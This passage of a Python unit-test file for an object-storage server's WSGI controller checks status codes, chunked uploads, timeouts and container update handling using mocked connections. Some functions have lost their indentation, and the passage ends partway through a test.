'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '400 ')
def test_call_not_found(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '404 ')
def test_call_bad_method(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'INVALID',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
    def test_call_name_collision(self):
        # Two different object paths are forced onto the same on-disk hash
        # (hash_path is mocked to a constant), so the second PUT must be
        # refused with 403 rather than clobbering the first object's data.
        def my_check(*args):
            return False

        def my_hash_path(*args):
            return md5('collide').hexdigest()
        with mock.patch("swift.obj.diskfile.hash_path", my_hash_path):
            with mock.patch("swift.obj.server.check_object_creation",
                            my_check):
                inbuf = WsgiBytesIO()
                errbuf = StringIO()
                outbuf = StringIO()

                def start_response(*args):
                    """Sends args to outbuf"""
                    outbuf.writelines(args)

                self.object_controller.__call__({
                    'REQUEST_METHOD': 'PUT',
                    'SCRIPT_NAME': '',
                    'PATH_INFO': '/sda1/p/a/c/o',
                    'SERVER_NAME': '127.0.0.1',
                    'SERVER_PORT': '8080',
                    'SERVER_PROTOCOL': 'HTTP/1.0',
                    'CONTENT_LENGTH': '0',
                    'CONTENT_TYPE': 'text/html',
                    'HTTP_X_TIMESTAMP': normalize_timestamp(1.2),
                    'wsgi.version': (1, 0),
                    'wsgi.url_scheme': 'http',
                    'wsgi.input': inbuf,
                    'wsgi.errors': errbuf,
                    'wsgi.multithread': False,
                    'wsgi.multiprocess': False,
                    'wsgi.run_once': False},
                    start_response)
                self.assertEqual(errbuf.getvalue(), '')
                self.assertEqual(outbuf.getvalue()[:4], '201 ')

                inbuf = WsgiBytesIO()
                errbuf = StringIO()
                outbuf = StringIO()

                def start_response(*args):
                    """Sends args to outbuf"""
                    outbuf.writelines(args)

                # Second PUT to a different name that hashes identically.
                self.object_controller.__call__({
                    'REQUEST_METHOD': 'PUT',
                    'SCRIPT_NAME': '',
                    'PATH_INFO': '/sda1/p/b/d/x',
                    'SERVER_NAME': '127.0.0.1',
                    'SERVER_PORT': '8080',
                    'SERVER_PROTOCOL': 'HTTP/1.0',
                    'CONTENT_LENGTH': '0',
                    'CONTENT_TYPE': 'text/html',
                    'HTTP_X_TIMESTAMP': normalize_timestamp(1.3),
                    'wsgi.version': (1, 0),
                    'wsgi.url_scheme': 'http',
                    'wsgi.input': inbuf,
                    'wsgi.errors': errbuf,
                    'wsgi.multithread': False,
                    'wsgi.multiprocess': False,
                    'wsgi.run_once': False},
                    start_response)
                self.assertEqual(errbuf.getvalue(), '')
                self.assertEqual(outbuf.getvalue()[:4], '403 ')
def test_invalid_method_doesnt_exist(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'method_doesnt_exist',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_invalid_method_is_not_public(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': '__init__',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_chunked_put(self):
listener = listen_zero()
port = listener.getsockname()[1]
killer = spawn(wsgi.server, listener, self.object_controller,
NullLogger())
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Content-Type: text/plain\r\n'
'Connection: close\r\nX-Timestamp: %s\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
1.0))
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 201'
self.assertEqual(headers[:len(exp)], exp)
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Connection: close\r\n\r\n')
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 200'
self.assertEqual(headers[:len(exp)], exp)
response = fd.read()
self.assertEqual(response, 'oh hai')
killer.kill()
def test_chunked_content_length_mismatch_zero(self):
listener = listen_zero()
port = listener.getsockname()[1]
killer = spawn(wsgi.server, listener, self.object_controller,
NullLogger())
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Content-Type: text/plain\r\n'
'Connection: close\r\nX-Timestamp: %s\r\n'
'Content-Length: 0\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
1.0))
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 201'
self.assertEqual(headers[:len(exp)], exp)
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Connection: close\r\n\r\n')
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 200'
self.assertEqual(headers[:len(exp)], exp)
response = fd.read()
self.assertEqual(response, 'oh hai')
killer.kill()
def test_max_object_name_length(self):
timestamp = normalize_timestamp(time())
max_name_len = constraints.MAX_OBJECT_NAME_LENGTH
req = Request.blank(
'/sda1/p/a/c/' + ('1' * max_name_len),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/' + ('2' * (max_name_len + 1)),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
    def test_max_upload_time(self):
        # An upload slower than the controller's max_upload_time must be
        # terminated with 408 (request timeout).

        class SlowBody(object):
            # wsgi.input stand-in: returns one byte per read() with a 0.1s
            # pause before each of the first four reads, then EOF.
            def __init__(self):
                self.sent = 0

            def read(self, size=-1):
                if self.sent < 4:
                    sleep(0.1)
                    self.sent += 1
                    return ' '
                return ''

            def set_hundred_continue_response_headers(*a, **kw):
                pass
        # With the default (large) max_upload_time the slow upload succeeds.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4', 'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Shrink the allowance below the ~0.4s the body takes -> 408.
        self.object_controller.max_upload_time = 0.1
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '4', 'Content-Type': 'text/plain'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 408)
def test_short_body(self):
class ShortBody(object):
def __init__(self):
self.sent = False
def read(self, size=-1):
if not self.sent:
self.sent = True
return ' '
return ''
def set_hundred_continue_response_headers(*a, **kw):
pass
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': ShortBody()},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 499)
def test_bad_sinces(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'},
body=' ')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': 'Not a valid date'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': 'Not a valid date'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
too_big_date_list = list(datetime.datetime.max.timetuple())
too_big_date_list[0] += 1 # bump up the year
too_big_date = strftime(
"%a, %d %b %Y %H:%M:%S UTC", struct_time(too_big_date_list))
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': too_big_date})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_content_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'},
body=' ')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
    def test_async_update_http_connect(self):
        """async_update must call http_connect with the expected positional
        args and forward the headers plus a user-agent/policy header."""
        policy = random.choice(list(POLICIES))
        self._stage_tmp_dir(policy)
        given_args = []

        def fake_http_connect(*args):
            # Capture the call, then blow up so no network I/O happens.
            given_args.extend(args)
            raise Exception('test')

        # Patch at module level; restore in finally so other tests are
        # unaffected even if the assertion fails.
        orig_http_connect = object_server.http_connect
        try:
            object_server.http_connect = fake_http_connect
            self.object_controller.async_update(
                'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
                {'x-timestamp': '1', 'x-out': 'set',
                 'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
                policy)
        finally:
            object_server.http_connect = orig_http_connect
        self.assertEqual(
            given_args,
            ['127.0.0.1', '1234', 'sdc1', 1, 'PUT', '/a/c/o', {
                'x-timestamp': '1', 'x-out': 'set',
                'user-agent': 'object-server %s' % os.getpid(),
                'X-Backend-Storage-Policy-Index': int(policy)}])
    @patch_policies([StoragePolicy(0, 'zero', True),
                     StoragePolicy(1, 'one'),
                     StoragePolicy(37, 'fantastico')])
    def test_updating_multiple_delete_at_container_servers(self):
        """A PUT with X-Delete-At info fans out one container update plus
        one expirer-container update per X-Delete-At-Host entry, and the
        expirer updates always use storage policy index 0."""
        # update router post patch
        self.object_controller._diskfile_router = diskfile.DiskFileRouter(
            self.conf, self.object_controller.logger)
        policy = random.choice(list(POLICIES))
        self.object_controller.expiring_objects_account = 'exp'
        self.object_controller.expiring_objects_container_divisor = 60

        http_connect_args = []

        def fake_http_connect(ipaddr, port, device, partition, method, path,
                              headers=None, query_string=None, ssl=False):
            # Record each outbound update and pretend it succeeded.

            class SuccessfulFakeConn(object):

                @property
                def status(self):
                    return 200

                def getresponse(self):
                    return self

                def read(self):
                    return ''

            captured_args = {'ipaddr': ipaddr, 'port': port,
                             'device': device, 'partition': partition,
                             'method': method, 'path': path, 'ssl': ssl,
                             'headers': headers, 'query_string': query_string}

            http_connect_args.append(
                dict((k, v) for k, v in captured_args.items()
                     if v is not None))

            return SuccessfulFakeConn()

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': int(policy),
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5',
                     'X-Container-Device': 'sdb1',
                     'X-Delete-At': 9999999999,
                     'X-Delete-At-Container': '9999999960',
                     'X-Delete-At-Host': "10.1.1.1:6201,10.2.2.2:6202",
                     'X-Delete-At-Partition': '6237',
                     'X-Delete-At-Device': 'sdp,sdq'})

        with mock.patch.object(
                object_server, 'http_connect', fake_http_connect):
            with fake_spawn():
                resp = req.get_response(self.object_controller)

        self.assertEqual(resp.status_int, 201)

        # Updates are spawned concurrently; sort for a stable comparison.
        http_connect_args.sort(key=operator.itemgetter('ipaddr'))

        self.assertEqual(len(http_connect_args), 3)
        self.assertEqual(
            http_connect_args[0],
            {'ipaddr': '1.2.3.4',
             'port': '5',
             'path': '/a/c/o',
             'device': 'sdb1',
             'partition': '20',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'application/burrito',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 'X-Backend-Storage-Policy-Index': int(policy),
                 'x-trans-id': '-'})})
        self.assertEqual(
            http_connect_args[1],
            {'ipaddr': '10.1.1.1',
             'port': '6201',
             'path': '/exp/9999999960/9999999999-a/c/o',
             'device': 'sdp',
             'partition': '6237',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'text/plain',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 # system account storage policy is 0
                 'X-Backend-Storage-Policy-Index': 0,
                 'x-trans-id': '-'})})
        self.assertEqual(
            http_connect_args[2],
            {'ipaddr': '10.2.2.2',
             'port': '6202',
             'path': '/exp/9999999960/9999999999-a/c/o',
             'device': 'sdq',
             'partition': '6237',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'text/plain',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 # system account storage policy is 0
                 'X-Backend-Storage-Policy-Index': 0,
                 'x-trans-id': '-'})})
    @patch_policies([StoragePolicy(0, 'zero', True),
                     StoragePolicy(1, 'one'),
                     StoragePolicy(26, 'twice-thirteen')])
    def test_updating_multiple_container_servers(self):
        """A PUT with comma-separated X-Container-Host/Device values sends
        one container update per host, preserving the request's policy."""
        # update router post patch
        self.object_controller._diskfile_router = diskfile.DiskFileRouter(
            self.conf, self.object_controller.logger)
        http_connect_args = []

        def fake_http_connect(ipaddr, port, device, partition, method, path,
                              headers=None, query_string=None, ssl=False):
            # Record each outbound update and pretend it succeeded.

            class SuccessfulFakeConn(object):

                @property
                def status(self):
                    return 200

                def getresponse(self):
                    return self

                def read(self):
                    return ''

            captured_args = {'ipaddr': ipaddr, 'port': port,
                             'device': device, 'partition': partition,
                             'method': method, 'path': path, 'ssl': ssl,
                             'headers': headers, 'query_string': query_string}

            http_connect_args.append(
                dict((k, v) for k, v in captured_args.items()
                     if v is not None))

            return SuccessfulFakeConn()

        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': '12345',
                     'Content-Type': 'application/burrito',
                     'Content-Length': '0',
                     'X-Backend-Storage-Policy-Index': '26',
                     'X-Container-Partition': '20',
                     'X-Container-Host': '1.2.3.4:5, 6.7.8.9:10',
                     'X-Container-Device': 'sdb1, sdf1'})

        with mock.patch.object(
                object_server, 'http_connect', fake_http_connect):
            with fake_spawn():
                req.get_response(self.object_controller)

        # Updates are spawned concurrently; sort for a stable comparison.
        http_connect_args.sort(key=operator.itemgetter('ipaddr'))

        self.assertEqual(len(http_connect_args), 2)
        self.assertEqual(
            http_connect_args[0],
            {'ipaddr': '1.2.3.4',
             'port': '5',
             'path': '/a/c/o',
             'device': 'sdb1',
             'partition': '20',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'application/burrito',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'X-Backend-Storage-Policy-Index': '26',
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 'x-trans-id': '-'})})
        self.assertEqual(
            http_connect_args[1],
            {'ipaddr': '6.7.8.9',
             'port': '10',
             'path': '/a/c/o',
             'device': 'sdf1',
             'partition': '20',
             'method': 'PUT',
             'ssl': False,
             'headers': HeaderKeyDict({
                 'x-content-type': 'application/burrito',
                 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
                 'x-size': '0',
                 'x-timestamp': utils.Timestamp('12345').internal,
                 'X-Backend-Storage-Policy-Index': '26',
                 'referer': 'PUT http://localhost/sda1/p/a/c/o',
                 'user-agent': 'object-server %d' % os.getpid(),
                 'x-trans-id': '-'})})
    def test_object_delete_at_async_update(self):
        """When both container and delete-at updates fail (500s), the PUT
        still succeeds and both updates land as async pendings; the
        expirer-account pending always records policy index 0."""
        policy = random.choice(list(POLICIES))

        container_updates = []

        def capture_updates(ip, port, method, path, headers, *args, **kwargs):
            container_updates.append((ip, port, method, path, headers))

        put_timestamp = next(self.ts).internal
        delete_at_timestamp = utils.normalize_delete_at_timestamp(
            next(self.ts).normal)
        # Round the delete-at time down to its expirer container bucket.
        delete_at_container = (
            int(delete_at_timestamp) /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        headers = {
            'Content-Type': 'text/plain',
            'X-Timestamp': put_timestamp,
            'X-Container-Host': '10.0.0.1:6201',
            'X-Container-Device': 'sda1',
            'X-Container-Partition': 'p',
            'X-Delete-At': delete_at_timestamp,
            'X-Delete-At-Container': delete_at_container,
            'X-Delete-At-Partition': 'p',
            'X-Delete-At-Host': '10.0.0.2:6202',
            'X-Delete-At-Device': 'sda1',
            'X-Backend-Storage-Policy-Index': int(policy)}
        if policy.policy_type == EC_POLICY:
            # EC PUTs require a fragment index.
            headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
        req = Request.blank(
            '/sda1/p/a/c/o', method='PUT', body='', headers=headers)
        # Both backend updates respond 500, forcing async pendings.
        with mocked_http_conn(
                500, 500, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(2, len(container_updates))
        delete_at_update, container_update = container_updates
        # delete_at_update
        ip, port, method, path, headers = delete_at_update
        self.assertEqual(ip, '10.0.0.2')
        self.assertEqual(port, '6202')
        self.assertEqual(method, 'PUT')
        self.assertEqual(path, '/sda1/p/.expiring_objects/%s/%s-a/c/o' %
                         (delete_at_container, delete_at_timestamp))
        expected = {
            'X-Timestamp': put_timestamp,
            # system account storage policy is 0
            'X-Backend-Storage-Policy-Index': 0,
        }
        for key, value in expected.items():
            self.assertEqual(headers[key], str(value))
        # container_update
        ip, port, method, path, headers = container_update
        self.assertEqual(ip, '10.0.0.1')
        self.assertEqual(port, '6201')
        self.assertEqual(method, 'PUT')
        self.assertEqual(path, '/sda1/p/a/c/o')
        expected = {
            'X-Timestamp': put_timestamp,
            'X-Backend-Storage-Policy-Index': int(policy),
        }
        for key, value in expected.items():
            self.assertEqual(headers[key], str(value))
        # check async pendings
        async_dir = os.path.join(self.testdir, 'sda1',
                                 diskfile.get_async_dir(policy))
        found_files = []
        for root, dirs, files in os.walk(async_dir):
            for f in files:
                async_file = os.path.join(root, f)
                found_files.append(async_file)
                data = pickle.load(open(async_file))
                if data['account'] == 'a':
                    # the object's own container update keeps its policy
                    self.assertEqual(
                        int(data['headers']
                            ['X-Backend-Storage-Policy-Index']), int(policy))
                elif data['account'] == '.expiring_objects':
                    # expirer-account updates are always policy 0
                    self.assertEqual(
                        int(data['headers']
                            ['X-Backend-Storage-Policy-Index']), 0)
                else:
                    self.fail('unexpected async pending data')
        self.assertEqual(2, len(found_files))
    def test_async_update_saves_on_exception(self):
        """If the container-server connection raises, async_update writes
        the update to the policy's async_pending directory instead."""
        policy = random.choice(list(POLICIES))
        self._stage_tmp_dir(policy)
        # Zero the hash prefix so the pending file's hashed path is
        # deterministic for the assertion below.
        _prefix = utils.HASH_PATH_PREFIX
        utils.HASH_PATH_PREFIX = ''

        def fake_http_connect(*args):
            raise Exception('test')

        orig_http_connect = object_server.http_connect
        try:
            object_server.http_connect = fake_http_connect
            self.object_controller.async_update(
                'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
                {'x-timestamp': '1', 'x-out': 'set',
                 'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
                policy)
        finally:
            object_server.http_connect = orig_http_connect
            utils.HASH_PATH_PREFIX = _prefix
        async_dir = diskfile.get_async_dir(policy)
        # The pickled pending must carry the full update, including the
        # injected user-agent header.
        self.assertEqual(
            pickle.load(open(os.path.join(
                self.testdir, 'sda1', async_dir, 'a83',
                '06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
                utils.Timestamp(1).internal))),
            {'headers': {'x-timestamp': '1', 'x-out': 'set',
                         'user-agent': 'object-server %s' % os.getpid(),
                         'X-Backend-Storage-Policy-Index': int(policy)},
             'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
    def test_async_update_saves_on_non_2xx(self):
        """Any non-2xx container-server response (1xx, 3xx, 5xx) makes
        async_update persist the update as an async pending."""
        policy = random.choice(list(POLICIES))
        self._stage_tmp_dir(policy)
        # Zero the hash prefix so the pending file path is deterministic.
        _prefix = utils.HASH_PATH_PREFIX
        utils.HASH_PATH_PREFIX = ''

        def fake_http_connect(status):

            class FakeConn(object):

                def __init__(self, status):
                    self.status = status

                def getresponse(self):
                    return self

                def read(self):
                    return ''

            return lambda *args: FakeConn(status)

        orig_http_connect = object_server.http_connect
        try:
            for status in (199, 300, 503):
                object_server.http_connect = fake_http_connect(status)
                self.object_controller.async_update(
                    'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
                    {'x-timestamp': '1', 'x-out': str(status),
                     'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
                    policy)
                async_dir = diskfile.get_async_dir(policy)
                self.assertEqual(
                    pickle.load(open(os.path.join(
                        self.testdir, 'sda1', async_dir, 'a83',
                        '06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
                        utils.Timestamp(1).internal))),
                    {'headers': {'x-timestamp': '1', 'x-out': str(status),
                                 'user-agent':
                                 'object-server %s' % os.getpid(),
                                 'X-Backend-Storage-Policy-Index':
                                 int(policy)},
                     'account': 'a', 'container': 'c', 'obj': 'o',
                     'op': 'PUT'})
        finally:
            object_server.http_connect = orig_http_connect
            utils.HASH_PATH_PREFIX = _prefix
    def test_async_update_does_not_save_on_2xx(self):
        """A successful (2xx) container-server response must NOT leave an
        async pending behind."""
        # Zero the hash prefix so the would-be pending path is known.
        _prefix = utils.HASH_PATH_PREFIX
        utils.HASH_PATH_PREFIX = ''

        def fake_http_connect(status):

            class FakeConn(object):

                def __init__(self, status):
                    self.status = status

                def getresponse(self):
                    return self

                def read(self):
                    return ''

            return lambda *args: FakeConn(status)

        orig_http_connect = object_server.http_connect
        try:
            for status in (200, 299):
                object_server.http_connect = fake_http_connect(status)
                self.object_controller.async_update(
                    'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
                    {'x-timestamp': '1', 'x-out': str(status)}, 'sda1', 0)
                self.assertFalse(
                    os.path.exists(os.path.join(
                        self.testdir, 'sda1', 'async_pending', 'a83',
                        '06fbf0b514e5199dfc4e00f42eb5ea83-0000000001.00000')))
        finally:
            object_server.http_connect = orig_http_connect
            utils.HASH_PATH_PREFIX = _prefix
    def test_async_update_saves_on_timeout(self):
        """A container-server response slower than node_timeout makes
        async_update persist the update as an async pending."""
        policy = random.choice(list(POLICIES))
        self._stage_tmp_dir(policy)
        # Zero the hash prefix so the pending file path is deterministic.
        _prefix = utils.HASH_PATH_PREFIX
        utils.HASH_PATH_PREFIX = ''

        def fake_http_connect():

            class FakeConn(object):

                def getresponse(self):
                    # Sleep far longer than the 0.001s node_timeout below.
                    return sleep(1)

            return lambda *args: FakeConn()

        orig_http_connect = object_server.http_connect
        try:
            for status in (200, 299):
                object_server.http_connect = fake_http_connect()
                self.object_controller.node_timeout = 0.001
                self.object_controller.async_update(
                    'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
                    {'x-timestamp': '1', 'x-out': str(status)}, 'sda1',
                    policy)
                async_dir = diskfile.get_async_dir(policy)
                self.assertTrue(
                    os.path.exists(os.path.join(
                        self.testdir, 'sda1', async_dir, 'a83',
                        '06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
                        utils.Timestamp(1).internal)))
        finally:
            object_server.http_connect = orig_http_connect
            utils.HASH_PATH_PREFIX = _prefix
def test_container_update_no_async_update(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.container_update(
'PUT', 'a', 'c', 'o', req, {
'x-size': '0', 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain', 'x-timestamp': '1'},
'sda1', policy)
self.assertEqual(given_args, [])
    def test_container_update_success(self):
        """A PUT with container update headers sends exactly one container
        update carrying the object's size, etag, type and timestamp."""
        container_updates = []

        def capture_updates(ip, port, method, path, headers, *args, **kwargs):
            container_updates.append((ip, port, method, path, headers))

        req = Request.blank(
            '/sda1/0/a/c/o',
            environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': 1,
                     'X-Trans-Id': '123',
                     'X-Container-Host': 'chost:cport',
                     'X-Container-Partition': 'cpartition',
                     'X-Container-Device': 'cdevice',
                     'Content-Type': 'text/plain'}, body='')
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        # All mocked responses must have been consumed.
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(len(container_updates), 1)
        ip, port, method, path, headers = container_updates[0]
        self.assertEqual(ip, 'chost')
        self.assertEqual(port, 'cport')
        self.assertEqual(method, 'PUT')
        self.assertEqual(path, '/cdevice/cpartition/a/c/o')
        self.assertEqual(headers, HeaderKeyDict({
            'user-agent': 'object-server %s' % os.getpid(),
            'x-size': '0',
            'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
            'x-content-type': 'text/plain',
            'x-timestamp': utils.Timestamp(1).internal,
            'X-Backend-Storage-Policy-Index': '0',  # default when not given
            'x-trans-id': '123',
            'referer': 'PUT http://localhost/sda1/0/a/c/o'}))
    def test_PUT_container_update_overrides(self):
        """Container-update override headers (backend X-Backend-* and
        middleware X-Object-Sysmeta-* variants) replace the etag,
        content-type etc. sent in the container update; the sysmeta
        variants win when both are present."""

        def do_test(override_headers):
            # Run one PUT with the given override headers and verify the
            # resulting container update used the override values.
            container_updates = []

            def capture_updates(
                    ip, port, method, path, headers, *args, **kwargs):
                container_updates.append((ip, port, method, path, headers))

            ts_put = next(self.ts)
            headers = {
                'X-Timestamp': ts_put.internal,
                'X-Trans-Id': '123',
                'X-Container-Host': 'chost:cport',
